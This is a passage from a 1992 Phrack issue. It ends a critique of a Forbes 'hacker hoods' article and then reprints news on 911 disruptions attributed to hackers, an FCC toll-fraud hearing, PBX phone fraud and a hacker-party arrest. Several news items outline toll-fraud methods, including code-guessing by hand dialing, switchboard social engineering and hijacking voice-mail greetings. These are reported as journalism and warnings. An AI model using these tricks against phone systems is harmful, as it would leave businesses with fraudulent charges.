  6301.      expert Donn Parker of consultants SRI International: "Such a
  6302.      'salami attack' is definitely possible, especially for an
  6303.      insider" (p. 186).
  6304.  
  6305. Has anybody calculated how many accounts one would have to "skim" a few pennies
  6306. from before obtaining $200,000?  At a dime apiece, that's over 2 million.  If
  6307. I'm figuring correctly, at one minute per account, 60 accounts per minute non-
  6308. stop for 24 hours a day all year, it would take nearly 4 straight years of on-
  6309. line computer work for an out-sider.  According to the story, it took only 3
  6310. months.  At 20 cents an account, that's over a million accounts.
  6311.  
  6312. Although no names or evidence are given, the story quotes Donn Parker of SRI as
  6313. saying that the story is a "definite possibility."  Over the years, there have
  6314. been cases of skimming, but as I remember the various incidents, all have been
  6315. inside jobs and few, if any, involved hackers.  The story is suspiciously
  6316. reminiscent of the infamous "bank cracking" article published in Phrack as a
  6317. spoof several years ago.
  6318.  
  6319. The basis for the claim that "hacker hoods" (former "playground bullies") are
  6320. now dangerous is based on a series of second and third-hand rumors and myths.
  6321. The authors then list from "generally reliable press reports" a half-dozen or
  6322. so non-hacker fraud cases that, in context, would seem to the casual reader to
  6323. be part of the "hacker menace." I counted in the article at least 24 instances
  6324. of half-truths, inaccuracies, distortions, questionable/spurious links, or
  6325. misleading claims that are reminiscent of 80s media hype. For example, the
  6326. article attributes to Phiber Optik counts in the MOD indictment that do not
  6327. include him, misleads on the Len Rose indictment and guilty plea, uses second
  6328. and third hand information as "fact" without checking the reliability, and
  6329. presents facts out of context (such as attributing the Morris Internet worm to
  6330. "hackers).
  6331.  
  6332. Featured as a key "hacker hood" is "Kimble," a German hacker said by some to be
  6333. sufficiently media-hungry and self-serving that he is ostracized by other
  6334. German hackers. His major crime reported in the story is hacking into PBXes.
  6335. While clearly wrong, his "crime" hardly qualifies him for the "hacker
  6336. hood/organized crime" danger that's the focus of the story. Perhaps he is
  6337. engaged in other activities unreported by the authors, but it appears he is
  6338. simply a run-of-the-mill petty rip-off artist. In fact, the authors do not make
  6339. much of his crimes. Instead, they leap to the conclusion that "hackers" do the
  6340. same thing and sell the numbers "increasingly" to criminals without a shred of
  6341. evidence for the leap.  To be sure the reader understands the menace, the
  6342. authors also invoke unsubstantiated images of a hacker/Turkish Mafia connection
  6343. and suggest that during the Gulf war, one hacker was paid "millions" to invade
  6344. a Pentagon computer and retrieve information from a spy satellite (p. 186).
  6345.  
  6346. Criminals use computers for crime. Some criminals may purchase numbers from
  6347. others. But the story paints a broader picture, and equates all computer crime
  6348. with "hacking."  The authors' logic seems to be that if a crime is committed
  6349. with a computer, it's a hacking crime, and therefore computer crime and
  6350. "hackers" are synonymous.  The story ignores the fact that most computer crime
  6351. is an "inside job" and it says nothing about the problem of security and how
  6352. the greatest danger to computer systems is careless users.
  6353.  
  6354. One short paragraph near the end mentions the concerns about civil liberties,
  6355. and the next paragraph mentions that EFF was formed to address these concerns.
  6356. However, nothing in the article articulates the bases for these concerns.
  6357. Instead, the piece promotes the "hacker as demon" mystique quite creatively.
  6358.  
  6359. The use of terms such as "new hoods on the block," "playground bullies," and
  6360. "hacker hoods" suggests that the purpose of the story was to find facts to fit
  6361. a slant.
  6362.  
  6363. In one sense, the authors might be able to claim that some of their "facts"
  6364. were accurate.  For example, the "playground bullies" phrase is attributed to
  6365. Cheshire Catalyst.  "Gee, *we* didn't say it!"  But, they don't identify
  6366. whether it's the original CC or not.  The phrase sounds like a term used in
  6367. recent internecine "hacker group" bickering, and if this was the context, it
  6368. hardly describes any new "hacker culture."  Even so, the use of the phrase
  6369. would be akin to a critic of the Forbes article referring to it as the product
  6370. of "media whores who are now getting paid for doing what they used to do for
  6371. free," and then applying the term "whores" to the authors because, hey, I
  6372. didn't make up the term, somebody else did, and I'm just reporting (and using
  6373. it as my central metaphor) just the way it was told to me.  However, I suspect
  6374. that neither Forbes' author would take kindly to being called a whore because
  6375. of the perception that they prostituted journalistic integrity for the pay-off
  6376. of a sexy story.  And this is what's wrong with the article: The authors take
  6377. rumors and catch-phrases, "merely report" the phrases, but then construct
  6378. premises around the phrases *as if* they were true with little (if any)
  6379. evidence.  They take an unconfirmed "truth" (where are fact checkers when you
  6380. need them) or an unrelated "fact" (such as an example of insider fraud) and
  6381. generalize from a discrete fact to a larger population. The article is an
  6382. excellent bit of creative writing.
  6383.  
  6384.  
  6385.                             Why Does It All Matter?
  6386.  
  6387. Computer crime is serious, costly, and must not be tolerated.  Rip-off is no
  6388. joke.  But, it helps to understand a problem before it can be solved, and lack
  6389. of understanding can lead to policies and laws that are not only ineffective,
  6390. but also a threat to civil liberties.  The public should be accurately informed
  6391. of the dangers of computer crime and how it can be prevented. However, little
  6392. will be served by creating demons and falsely attributing to them the sins of
  6393. others.  It is bad enough that the meaning" of the term "hacker" has been used
  6394. to apply both to both computer delinquents and creative explorers without also
  6395. having the label extended to include all other forms of computer criminals as
  6396. well.
  6397.  
  6398. CPSR, the EFF, CuD, and many, many others have worked, with some success, to
  6399. educate the media about both dangers of computer crime and the dangers of
  6400. inaccurately reporting it and attributing it to "hackers."  Some, perhaps most,
  6401. reporters take their work seriously, let the facts speak to them, and at least
  6402. make a good-faith effort not to fit their "facts" into a narrative that--by one
  6403. authors' indication at least -- seems to have been predetermined.
  6404.  
  6405. Contrary to billing, there was no evidence in the story, other than
  6406. questionable rumor, of "hacker" connection to organized crime.  Yet, this type
  6407. of article has been used by legislators and some law enforcement agents to
  6408. justify a "crackdown" on conventional hackers as if they were the ultimate
  6409. menace to society.  Forbes, with a paid circulation of over 735,000 (compared
  6410. to CuDs unpaid circulation of only 40,000), reaches a significant and
  6411. influential population.  Hysterical stories create hysterical images, and these
  6412. create hysteria-based laws that threaten the rights of law-abiding users.  When
  6413. a problem is defined by irresponsibly produced images and then fed to the
  6414. public, it becomes more difficult to overcome policies and laws that restrict
  6415. rights in cyberspace.
  6416.  
  6417. The issue is not whether "hackers" are or are not portrayed favorably.  Rather,
  6418. the issue is whether images reinforce a witch-hunt mentality that leads to the
  6419. excesses of Operation Sun Devil, the Steve Jackson Games fiasco, or excessive
  6420. sentences for those who are either law-abiding or are set up as scapegoats.
  6421. The danger of the Forbes article is that it contributes to the persecution of
  6422. those who are stigmatized not so much for their acts, but rather for the signs
  6423. they bear.
  6424. _______________________________________________________________________________
  6425.  
  6426.  
  6427.                                 ==Phrack Inc.==
  6428.  
  6429.                   Volume Four, Issue Forty-One, File 13 of 13
  6430.  
  6431.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  6432.               PWN                                             PWN
  6433.               PWN              Phrack World News              PWN
  6434.               PWN                                             PWN
  6435.               PWN           Issue 41 / Part 3 of 3            PWN
  6436.               PWN                                             PWN
  6437.               PWN        Compiled by Datastream Cowboy        PWN
  6438.               PWN                                             PWN
  6439.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  6440.  
  6441.  
  6442.  Boy, 15, Arrested After 911 Paralyzed By Computer Hacker       October 7, 1992
  6443.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6444.  by Caroline Mallan (The Toronto Star)(Page A22)
  6445.  
  6446. A 15-year-old boy has been arrested after a hacker pulling computer pranks
  6447. paralyzed Metro's emergency 911 service.
  6448.  
  6449. Police with Metro's major crime unit investigated the origin of countless calls
  6450. placed to the 911 service from mid-July through last month.
  6451.  
  6452. The calls were routed to emergency services in the Etobicoke area, said
  6453. Detective Willie Johnston, who led the investigation.
  6454.  
  6455. Phony medical emergency calls were reported and police, fire and ambulance
  6456. crews were dispatched on false alarms.  On one occasion, the computer hacker
  6457. managed to tie up the entire 911 service in Metro -- making it unavailable for
  6458. true emergencies.
  6459.  
  6460. Police were not sure last night how long the system was shut down for but
  6461. Johnston said the period was considerable.
  6462.  
  6463. Staff Sergeant Mike Sale warned hackers that phony calls can be traced.
  6464.  
  6465. "A criminal abuse of the 911 emergency system will result in a criminal
  6466. investigation and will result in an arrest," Sale said, adding police had only
  6467. been investigating this hacker for a few weeks before they came up with a
  6468. suspect.
  6469.  
  6470. Bell Canada investigators helped police to trace the origin of the calls and
  6471. officers yesterday arrested a teen while he was in his Grade 11 class at a
  6472. North York high school.
  6473.  
  6474. Two computers were seized from the boy's home and will be sent to Ottawa to be
  6475. analyzed.
  6476.  
  6477. Johnston said police are concerned that other hackers may also be able to halt
  6478. the 911 service, since the computer technology used was fairly basic, although
  6479. the process of rerouting the calls from a home to the Etobicoke emergency lines
  6480. was very complex.
  6481.  
  6482. The calls went via computer modem through two separate phone systems in major
  6483. U.S. cities before being sent back to Canada, Johnston explained.
  6484.  
  6485. The suspect, who cannot be named under the Young Offenders Act, is charged with
  6486. theft of telecommunications, 24 counts of mischief and 10 counts of conveying
  6487. false messages.
  6488.  
  6489. He was released from custody and will appear in North York youth court November
  6490. 6, police said.
  6491.  
  6492. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6493.  
  6494.  Police Say They've Got Hackers' Number                         October 8, 1992
  6495.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6496.  by John Deverell (The Toronto Star)(Page A8)
  6497.  
  6498.       Hackers, take note.  Metro police and Ma Bell are going to get you.
  6499.  
  6500. A young North York computer freak accused of launching 10 false medical alerts
  6501. to 911 this summer may have learned -- the hard way -- that his telephone
  6502. tricks weren't beating the pros.
  6503.  
  6504. Police arrived with a search warrant at the home of the 15-year-old, arrested
  6505. him and carted away his computer.
  6506.  
  6507. He's charged with 10 counts of conveying false messages, 24 counts of mischief,
  6508. and theft of telecommunications.
  6509.  
  6510. Inspector Bill Holdridge, of 911 emergency services, said the false alarms in
  6511. July and August never posed any technical problem to his switchboard but
  6512. resulted in wild goose chases for the police, fire and ambulance services.
  6513.  
  6514. "Those resources weren't available for real alarms, which could have been a
  6515. serious problem," Holdridge said.
  6516.  
  6517. The 911 service, quartered at 590 Jarvis Street, gets about 7,000 calls a day,
  6518. of which 30% warrant some kind of emergency response.
  6519.  
  6520. Normally, a computerized tracing system takes only seconds to provide the
  6521. address and number of the telephone from which a call originates -- unless the
  6522. point of origin has been somehow disguised.
  6523.  
  6524. Apparently the 911 prankster got into the telephone system illegally and routed
  6525. his calls through several U.S. networks before bringing them back to Toronto.
  6526.  
  6527. Detective Willie Johnston said the boy's parents were stunned when police
  6528. arrived.  "They really didn't have a clue what was going on," said Johnston.
  6529.  
  6530. The false emergencies reported were nowhere near the accused boy's home.
  6531. "Without condoning it, you could understand it if he were sitting around the
  6532. corner watching the flashing lights," said Johnston.  "But they were miles
  6533. away. It defies logic."
  6534.  
  6535. Neither Johnston nor Holdridge would explain how they and Bell security finally
  6536. traced the false alarms. "That might just make other hackers try to figure out
  6537. another way," Holdridge said.
  6538.  
  6539. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6540.  
  6541.  Hackers Targeted 911 Systems, Police Say                      October 10, 1992
  6542.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6543.  Taken from United Press International
  6544.  
  6545. Authorities expect to make more arrests after penetrating a loose network of
  6546. computer hackers called the "Legion of Doom" they say tapped into corporate
  6547. phone lines to call 911 systems nationwide with the intent of disrupting
  6548. emergency services.
  6549.  
  6550. Prosecutors from Virginia, New Jersey and Maryland -- in conjunction with
  6551. investigators from two telephone companies -- traced some of the hackers and
  6552. closed in on three homes in two states.
  6553.  
  6554. A 23-year-old Newark, New Jersey man was arrested early on October 9th.  He
  6555. faces several charges, including fraud.  Other arrests are expected in two
  6556. Maryland locations.
  6557.  
  6558. The suspect, known by several aliases and identified by authorities only as
  6559. Maverick, told investigators the group's intent was "to attempt to penetrate
  6560. the 911 computer systems and infect them with viruses to cause havoc," said
  6561. Captain James Bourque of the Chesterfield County police in Virginia.
  6562.  
  6563. The probe is just beginning, according to Bourque.  "Quite honestly, I think
  6564. it's only the tip of the iceberg," he said.
  6565.  
  6566. The hackers first penetrate the phone lines of large companies or pay phones,
  6567. then use those connections to call 911 lines, Bourque said.  The hackers
  6568. usually make conference calls to other 911 services in other cities, tying up
  6569. communications in several locations simultaneously.
  6570.  
  6571. "One time we were linked up with Toronto and Los Angeles jurisdictions,"
  6572. Bourque said.  "And none of us could disconnect."
  6573.  
  6574. Sometimes as many five hackers would be on the line and would make false calls
  6575. for help.  Communications officers, unable to stop the calls, would have to
  6576. listen, then try to persuade the officers in other locales "that the call
  6577. wasn't real," Bourque said.
  6578.  
  6579. "Obviously, there's a real potential for disastrous consequences," he said.
  6580.  
  6581. One phone bill charged to a company in Minnesota indicated the scope of the
  6582. problem.  The company discovered in a 30-day period that it had been charged
  6583. with more than $100,000 in phone calls generated by the hackers, according to
  6584. Bourque.
  6585.  
  6586. "I'm sure there are a multitude of other jurisdictions across the country
  6587. having the same problems," Bourque said.
  6588.  
  6589. People identifying themselves as members of the "Legion of Doom" -- which also
  6590. is the name of a pro wresting team -- have called a Richmond, Virginia
  6591. television station and ABC in New York in an attempt to get publicity, Bourque
  6592. said.
  6593.  
  6594. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6595.  
  6596.  More On 911 "Legion Of Doom" Hacking Case                     October 20, 1992
  6597.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6598.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  6599.  
  6600. NEW YORK CITY -- In a discussion with Newsbytes, Sgt. Kurt Leonard of the
  6601. Chesterfield County, Virginia Police Department has disclosed further
  6602. information concerning the on-going investigation of alleged 911 disruption
  6603. throughout the eastern seaboard of the United States by individuals purporting
  6604. to be members of the hacker group "The Legion of Doom" (LOD).
  6605.  
  6606. Leonard identified the individual arrested in Newark, New Jersey, previously
  6607. referred to only as "Maverick," as Scott Maverick, 23.  Maverick has been
  6608. charged with terroristic threats, obstruction of a government function, and
  6609. illegal access to a computer.  He is presently out on bail.
  6610.  
  6611. Leonard said that David Pluchino, 22, was charged to the same counts as
  6612. Maverick and an additional count of the possession of burglary tools.  Leonard
  6613. said that Pluchino, the subject of a 1990 Secret Service "search and seizure"
  6614. action under the still on-going "Operation SunDevil" investigation," possessed
  6615. information linking him with members of the Legion of Doom.
  6616.  
  6617. The Legion of Doom connection has become the subject of controversy within the
  6618. online community.  Although Maverick has been quoted as saying that he is a
  6619. member of the group and that the group's intent was "to attempt to penetrate
  6620. the 911 computer systems and inflect them with viruses to cause havoc," members
  6621. of the group have disavowed any connection with those arrested.
  6622.  
  6623. "Lex Luthor," one of the original members of the group, told Newsbytes when the
  6624. initial report of the arrests became public: "As far as I am concerned the LOD
  6625. has been dead for a couple of years, never to be revived.  Maverick was never
  6626. in LOD.  There have been 2 lists of members (one in Phrack and another in the
  6627. LOD tj) and those lists are the final word on membership."
  6628.  
  6629. He added, "We obviously cannot prevent copy-cats from saying they are in LOD.
  6630. When there was an LOD, our goals were to explore and leave systems as we found
  6631. them.  The goals were to expose security flaws so they could be fixed before
  6632. REAL criminals and vandals such as this Maverick character could do damage.  If
  6633. this Maverick character did indeed disrupt E911 service he should be not only
  6634. be charged with computer trespassing but also attempted murder.  911 is serious
  6635. business."
  6636.  
  6637. Lex Luthor's comments, made before the names of the arrested were released,
  6638. were echoed by Chris Goggans, aka "Erik Bloodaxe," and Mark Abene, aka "Phiber
  6639. Optik," both ex-LOD members, and by Craig Neidorf who chronicled the membership
  6640. of LOD in his electronic publication "Phrack."
  6641.  
  6642. When the names of the arrested became public, Newsbytes again contacted Lex
  6643. Luthor to see if the names were familiar.  Luthor replied: "Can't add anything,
  6644. I never heard of them."
  6645.  
  6646. Phiber Optik, a New York resident, told Newsbytes that he remembered Pluchino
  6647. as a person that ran a computer "chat" system called "Interchat" based in New
  6648. Jersey.  "They never were LOD members and Pluchino was not known as a computer
  6649. hacker.  It sounds as though they were LOD wanabees who are now, by going to
  6650. jail, going to get the attention they desire," he said.
  6651.  
  6652. A law enforcement official, familiar with the SunDevil investigation of
  6653. Pluchino, agreed with Phiber, saying, "There was no indication of any
  6654. connection with the Legion of Doom."  The official, speaking under the
  6655. condition of anonymity, also told Newsbytes that the SunDevil investigation of
  6656. Pluchino is still proceeding and, as such, no comment can be made.
  6657.  
  6658. Leonard also told Newsbytes that the investigation has been a joint effort of
  6659. New Jersey, Maryland, and Virginia police departments and said that, in
  6660. conjunction with the October 9th 2:00 AM arrests of Pluchino and Maverick, a
  6661. simultaneous "search and seizure" operation was carried out at the Hanover,
  6662. Maryland home of Zohar Shif, aka "Zeke," a 23 year-old who had also been the
  6663. subject of a SunDevil search and seizure.
  6664.  
  6665. Leonard also said that, in addition to computers taken from Pluchino, material
  6666. was found "establishing a link to the Legion of Doom."  Told of the comments by
  6667. LOD members that the group did not exist anymore, Leonard said "While the
  6668. original members may have gone on to other things, these people say they are
  6669. the LOD and some of them have direct connection to LOD members and have LOD
  6670. materials."
  6671.  
  6672. Asked by Newsbytes to comment on Leonard's comments, Phiber Optik said "The
  6673. material he's referring to is probably text files that have been floating
  6674. around BBS's for years, Just because someone has downloaded the files certainly
  6675. doesn't mean that they are or ever were connected with LOD."
  6676. _______________________________________________________________________________
  6677.  
  6678.  Complaints On Toll Fraud Aired at FCC En Banc Hearing         October 13, 1992
  6679.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6680.  by Art Brodsky (Communications Daily)(Page 1)
  6681.  
  6682. Customers of PBX manufacturers told the Federal Communications Commission (FCC)
  6683. they shouldn't be liable for toll fraud losses incurred because vendors never
  6684. told them of capabilities of their equipment that left companies open to
  6685. electronic theft.  Their case was buttressed by one of country's leading toll-
  6686. fraud investigators, who told day-long en banc hearing that customers shouldn't
  6687. have to pay if they're victimized.  Donald Delaney of the New York State Police
  6688. said toll fraud "is the only crime I know where the victims are held liable."
  6689. Toll fraud losses have been estimated to run into billions of dollars.
  6690.  
  6691. Commission's look at toll fraud came in context of what FCC can do to prevent
  6692. or lessen problem.  Comr. Marshall said Commission's job would be to apportion
  6693. liability between vendors and customers.  Comr. Duggan, who has been leader on
  6694. issue at Commission, said toll fraud was "hidden degenerative disease on the
  6695. body of business."  He focused on insurance solution to problem, along with
  6696. sharing of liability.  There are cases pending at FCC filed by AT&T customers
  6697. that deal with sharing of liability, and whether common carriers are protected
  6698. by tariffs from paying customers for losses.  Witnesses told Commission it was
  6699. hard to find any law enforcement agency interested in problem, from local
  6700. police to FBI, in addition to difficulties with vendors.  U.S. Secret Service
  6701. has statutory responsibility over toll fraud, said attorney William Cook, who
  6702. testified in afternoon session.  There was general agreement that more customer
  6703. education was needed to prevent fraud, policy endorsed by Northern Telecom,
  6704. which has active customer education program.
  6705.  
  6706. AT&T came in for particular criticism in morning session as users said company
  6707. was insensitive to toll fraud problems.  Thomas Mara, executive vice-president
  6708. Leucadia National Corp., whose company suffered $300,000 in toll fraud, said he
  6709. "had a hell of a time getting anybody at AT&T to pay attention" to problems his
  6710. company was encountering.  Mara said his company saw level of 800 calls rise to
  6711. 10,448 from 100.  He said AT&T was supposed to notify users if there was any
  6712. "dramatic increase in volume, yet we were not notified of a thousandfold
  6713. increase in 800 number usage nor were we informed of an increase from a few
  6714. hours a month in international calls to thousands of hours by AT&T, only after
  6715. receiving our bills."  Investigation found that 800 number connecting Rolm
  6716. switch to company's voice mail was hackers' entry method, Mara said.
  6717.  
  6718. Clearly angry with AT&T, Mara said he has "a feeling they use it as a profit
  6719. center."  Lawrence Gessini, telecommunications director for Agway Corp. of
  6720. Syracuse, agreed, saying: "Toll fraud should not become a rationale for higher
  6721. profits for carriers."  He told FCC that new programs introduced by long
  6722. distance carriers won't solve problem because of constraints, limitations and
  6723. expense.
  6724.  
  6725. Speaking for International Communications Association (ICA) user group, Gessini
  6726. said problems occur because new technologies allow more types of fraud and
  6727. because "old tariff concepts" that limit common carrier liability "distort
  6728. market incentives."  Vendors, he said, are "generally lackadaisical and are
  6729. slow to correct even known problems in their hardware, firmware and software,"
  6730. and give low priority to complaints.  ICA advocated 5 principles including FCC
  6731. inquiry into fraud, creation of advisory committee and willingness of
  6732. Commission to protect users.
  6733.  
  6734. Geoffrey Williams, industry consultant and telecommunications manager for
  6735. IOMEGA Corp., said AT&T has been "most notable" for asking for restitution,
  6736. while Sprint and MCI are more lenient.  MCI doesn't charge users for first
  6737. hacking incident, he said, but after that users are on their own.
  6738.  
  6739. AT&T defended itself in afternoon session, when International Collections Dist.
  6740. Manager Peter Coulter rejected users' accusations, saying company had increased
  6741. customer education program "dramatically" since last year.  He insisted that
  6742. AT&T is "very concerned" by toll fraud: "Contrary to what some people want to
  6743. believe, no long distance carrier is making a profit off toll fraud."  He said
  6744. AT&T had 6,000 customers attend equipment security seminars in 1991, but that
  6745. number had been exceeded in first 6 months of 1992.  He said results of
  6746. increased education program were "only preliminary" but his group was receiving
  6747. "a lot more accommodations" than complaints from customers.
  6748.  
  6749. Coulter, while never admitting that company should shoulder any financial
  6750. liability, admitted that "things are different now" as to how AT&T approaches
  6751. toll fraud problem.  He said that within AT&T it used to be hardware division
  6752. vs. service division.  "The hardware guys said it was a service problem, the
  6753. service guys said it was the hardware's fault," Coulter said.  But now both
  6754. divisions are "working together on the problem . . . we're talking to each
  6755. other."
  6756.  
  6757. Delaney of N.Y. state police gave the FCC a picture of the toll fraud situation
  6758. dominated by as few as 15 practitioners, most of whom gain illegal entry to
  6759. telephone systems simply by dialing numbers for hours on end.  Those so-called
  6760. "finger hackers," rather than computer hackers, are responsible for 90% of
  6761. fraud, he said, telling Commission that equipment vendors should be held
  6762. accountable for fraud.  Most fraudulent calls go to Pakistan, Colombia and
  6763. Dominican Republic, he said.
  6764.  
  6765. Delaney pointed out practical objection to further vendor education problem,
  6766. telling commissioners that for vendor to engage in education would also be to
  6767. admit there could be problem with equipment security, something sales people
  6768. don't want to do.  He said some customers had been sold systems and didn't know
  6769. they had capability for remote access -- means used by hackers to gain entry.
  6770. _______________________________________________________________________________
  6771.  
  6772.  Hanging Up On Hackers                                         October 12, 1992
  6773.  ~~~~~~~~~~~~~~~~~~~~~
  6774.  by Miriam Leuchter (Crain's New York Business)(Page 21)
  6775.  
  6776.             "Thieves tap phone systems, but business cuts the line."
  6777.  
  6778. Ron Hanley suspected a technical glitch when his company's telephone bill
  6779. listed an unusually large number of calls lasting four seconds to its 800-
  6780. number from New York City.  But the executive at Dataproducts New England in
  6781. Wallingford, Connecticut didn't lose sleep over the problem -- until he got a
  6782. call two months later from the security department at American Telephone &
  6783. Telegraph Co.
  6784.  
  6785. Dataproducts had been hacked.  Two days after that, Mr. Hanley got a bill
  6786. confirming the bad news:  In one 24-hour period, street-corner phone users in
  6787. New York had made some 2,000 calls to the Caribbean on the company's line,
  6788. ringing up about $50,000 in tolls.
  6789.  
  6790. Dataproducts is not alone.  Estimates of the cost of telecommunications fraud
  6791. in the United States each year run from $1 billion to as much as $9 billion.
  6792. According to John J. Haugh, editor of Toll Fraud and Telabuse and chairman of a
  6793. Portland, Oregon consulting firm, losses reached $4 billion in 1991 and are
  6794. expected to climb 30% in 1992.
  6795.  
  6796. Some 35,000 businesses and other users -- such as foundations and government
  6797. agencies -- will be hit this year.  In the first six months, Mr. Haugh says,
  6798. more than 900 New York City companies were victims of telephone-related fraud.
  6799.  
  6800. "If you have a PBX system or calling cards or voice mail, you are vulnerable,
  6801. exceedingly vulnerable," says Peggy Snyder, executive director of the
  6802. Communications Fraud Control Association, a national information clearinghouse
  6803. based in Washington.  "As technology gets more user-friendly, the opportunity
  6804. to commit a crime is much greater."
  6805.  
  6806. Armed with computers, modems and sometimes automatic dialers or random-number
  6807. generating software, high-technology thieves can use your telephone system as
  6808. if it is their own -- without having to pay the tolls.  The series of very
  6809. short calls Mr. Hanley spotted on one phone bill should have tipped off his
  6810. 800-number service provider -- which he had alerted when he spotted the pattern
  6811. -- that hackers were trying to break into his system.
  6812.  
  6813. Who are these hackers -- a term used to describe someone who uses a telephone
  6814. or computer to obtain unauthorized access to other computers?  Many are
  6815. teenagers or young adults out to demonstrate their computer skills and make
  6816. some mischief.  Five young New Yorkers are awaiting trial in federal court on
  6817. unauthorized access and interception of electronic communications charges in
  6818. one widely publicized telephone fraud case.
  6819.  
  6820. A much smaller proportion are more serious criminals: drug dealers, money
  6821. launderers and the like, who don't want their calls traced.  In one case, Ms.
  6822. Snyder cites a prostitution ring that employed unused voice mail extensions at
  6823. one company to leave and receive messages from clients.
  6824.  
  6825. Many hackers have connections to call-sell operators who set up shop at phone
  6826. booths, primarily in poorer immigrant neighborhoods in cities from New York to
  6827. Los Angeles.  For a flat fee -- the going rate is $10, according to one source
  6828. -- callers can phone anywhere in the world and talk as long as they want.  The
  6829. hawker at the phone booth pockets the cash and someone else pays the bill.
  6830.  
  6831. Perhaps 15 to 20 so-called finger hackers (who crack authorization codes by
  6832. hand dialing) distribute information to call-sell operators at thousands of
  6833. locations in New York.  According to Don Delaney, a senior investigator for the
  6834. New York State Police, the bulk of such calls from phone booths in the city go
  6835. to the Dominican Republic, Pakistan and Colombia.
  6836.  
  6837. Hackers may use more than technical skill to gain the access they want.
  6838. Sometimes they practice "social engineering" -- talking a company's employees
  6839. into divulging information about the telephone system.  Or they manage a
  6840. credible imitation of an employee, pretending to be an employee.
  6841.  
  6842. In one of the latest schemes, a fraudulent caller gets into a company's system
  6843. and asks the switchboard operator to connect him with an outside operator.  The
  6844. switchboard assumes the caller is an employee who wants to make a personal call
  6845. on his own calling card.
  6846.  
  6847. Instead, he uses a stolen or hacked calling card number.  The fraud goes
  6848. undetected until the card's owner reports the unauthorized use to his long-
  6849. distance carrier.  If the cardholder refuses to pay the charges, the phone
  6850. company traces the calls to the business from which they were placed.  Because
  6851. it looks as if the call came from the company, it is often held liable for the
  6852. charge.
  6853.  
  6854. In another new twist, a hacker gains access to an unused voice mail extension
  6855. at a company, or takes over someone's line at night or while the regular user
  6856. is on vacation.  He changes the recorded announcement to say, "Operator, this
  6857. number will accept all collect and third-party calls."  Then the hacker -- or
  6858. anyone else -- can telephone anywhere in the world and bill the charges to that
  6859. extension.
  6860.  
  6861. Sometimes the fraud is much more organized and sophisticated, however.  Robert
  6862. Rasor, special agent in charge of the financial crime division of the U.S.
  6863. Secret Service, gives an example of a three-way calling scheme in which hackers
  6864. tap into a phone system in the United States and set up a separate network that
  6865. allows people in other countries to call each other directly.  "The
  6866. Palestinians are one of the more prominent groups" running these sorts of
  6867. fraud, he says.
  6868.  
  6869. But no matter who the end user is, businesses like Dataproducts end up footing
  6870. the bill.  Personal users are generally not held liable for the unauthorized
  6871. use of their calling card numbers.  Under current regulation, a business is
  6872. responsible for all calls that go through its equipment, whether or not those
  6873. calls originated at the company.
  6874.  
  6875. This hard fact rankles Mr. Hanley.  "It's totally frustrating and almost
  6876. unbelievable that you're responsible for this bill.  It's really frightening
  6877. for any company."
  6878.  
  6879. Dataproducts's liability was relatively small compared with the $168,000
  6880. average Mr. Haugh calculated in a study he made last year.  It could have been
  6881. worse yet.
  6882.  
  6883. "The largest case I've ever seen in the metropolitan region was a company that
  6884. lost almost $1 million within 30 days," says Alan Brill, managing director of
  6885. the New York corporate security firm Kroll Associates Inc.
  6886.  
  6887. "It was a double whammy, because even though their long-distance carrier saw a
  6888. suspicious pattern of calls and blocked access to those area codes, the company
  6889. didn't know its PBX system would automatically switch to another carrier if
  6890. calls couldn't go through," Mr. Brill says.  "So the company got a bill for
  6891. $300,000 from its primary carrier and a $600,000 bill from the secondary
  6892. carrier."
  6893.  
  6894. Both AT&T and Sprint Corp. offer service plans that limit liability to $25,000
  6895. per fraud episode for their business customers.  Mr. Brill advises companies to
  6896. evaluate the cost-effectiveness of these plans in great detail, because in
  6897. order to be eligible for coverage companies must take certain steps to minimize
  6898. their risk.  "If you reduce your risk significantly, you may not need the
  6899. coverage," he says.
  6900.  
  6901. The plans require customers to respond to a problem in as little as two hours
  6902. after notification of unauthorized calls.  Doing so will stem your losses in
  6903. any event.  "You also have to think about how you're staffed," adds Mr. Brill.
  6904. "Can you act that fast?"
  6905. _______________________________________________________________________________
  6906.  
  6907.  PWN Quicknotes
  6908.  ~~~~~~~~~~~~~~
  6909.  
  6910. 1.  HACKER PARTY BUSTED (by Robert Burg, Gannett, 11/3/92) -- "PumpCon Popped!"
  6911.     -- WHITE PLAINS, New York -- Police say a Halloween party they broke up
  6912.     Sunday (11/1/92) was more than just a rowdy party - it also was a computer
  6913.     hacker party.
  6914.  
  6915.     Three men were charged with unauthorized use of a computer and attempting
  6916.     computer trespass.  A fourth man was arrested on an outstanding warrant
  6917.     involving violating probation on a charge of computer fraud in Arizona,
  6918.     Greenburgh Detective Lt. Cornelius Sullivan said.
  6919.  
  6920.     Security officers at the Westchester Marriott contacted police after
  6921.     noticing an unusual number of people entering and leaving one room.  Police
  6922.     said that when they arrived, there were 21 people inside and computers
  6923.     hooked up to telephone lines.  Police said they also found telephone credit
  6924.     cards that did not belong to any of the people present.
  6925.  
  6926.     The three charged with unauthorized use of a computer and attempted
  6927.     computer trespass were Randy Sigman, 40, of Newington, Connecticut; Ronald
  6928.     G. Pinz, 21, of Wallingford, Connecticut and Byron Woodard, 18, of
  6929.     Woonsocket, Rhode Island.
  6930.  
  6931.     They were being held at the Westchester County Jail in Valhalla pending
  6932.     arraignment.
  6933.  
  6934.     The man charged on the warrant, Jason Brittain, 22, of Tucson, Arizona, was
  6935.     being held without bail pending arraignment.
  6936.  
  6937.     The Westchester County District Attorney frauds division seized the
  6938.     computer hardware, software, and other electrical equipment.
  6939.  
  6940.     Sullivan said the party-goers heard about the party through computer
  6941.     bulletin boards.
  6942.  
  6943. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6944.  
